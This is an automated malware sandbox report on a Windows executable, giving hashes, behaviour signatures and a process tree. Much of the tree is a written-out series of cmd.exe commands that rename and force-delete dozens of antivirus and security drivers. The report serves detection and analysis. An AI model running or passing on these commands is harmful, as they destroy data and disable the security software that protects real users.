Analysis
-
max time kernel
126s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
25-11-2022 03:28
General
-
Target
74161da72b92f3dc29efa72b75dcf86c.exe
-
Size
19.9MB
-
MD5
74161da72b92f3dc29efa72b75dcf86c
-
SHA1
8490c1331b1c40ce986306d5dda51670f93fd78c
-
SHA256
6e83d9e27d565709d8ee5980ff30cd4db9f0ffaf57ff81fdcca468556e189ad2
-
SHA512
ced5b9e9358e9ebeed90d1f65fa994adcc55efb3ec9de1e382e671bd584777733ade7bb309031674797d68b8338cd79873a3e467a831ade9fb8159be96b58c5f
-
SSDEEP
393216:Dowc0wiNiY5FZqOlRQKihdkdByFFCEJnBdTikjkDAWIjoS1SpyEeqBAClYljKAgA:pXbeOyFFCYBdTikgcWxS1OdeqGCluCAF
Score
8/10
Malware Config
Signatures
-
Executes dropped EXE 11 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Sets file execution options in registry 2 TTPs 7 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe 16 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies Internet Explorer settings 1 TTPs 13 IoCs
-
Runs ping.exe 1 TTPs 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\74161da72b92f3dc29efa72b75dcf86c.exe"C:\Users\Admin\AppData\Local\Temp\74161da72b92f3dc29efa72b75dcf86c.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files\AIOC4\StartNetApp.exe"C:\Program Files\AIOC4\StartNetApp.exe"2⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\s_a.exe"C:\ProgramData\s_a.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\AIOC4\AIOC4.exe"C:\Program Files\AIOC4\AIOC4.exe"3⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*4⤵
-
C:\Program Files\AIOC4\PrimaryScreen.exe"PrimaryScreen.exe" ScaleX4⤵
- Executes dropped EXE
-
C:\Program Files\AIOC4\AIOC4.exe"C:\Program Files\AIOC4\AIOC4.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*5⤵
-
C:\Program Files\AIOC4\PrimaryScreen.exe"PrimaryScreen.exe" ScaleX5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C ver5⤵
-
C:\Program Files\AIOC4\AIOC4.exe"C:\Program Files\AIOC4\AIOC4.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*6⤵
-
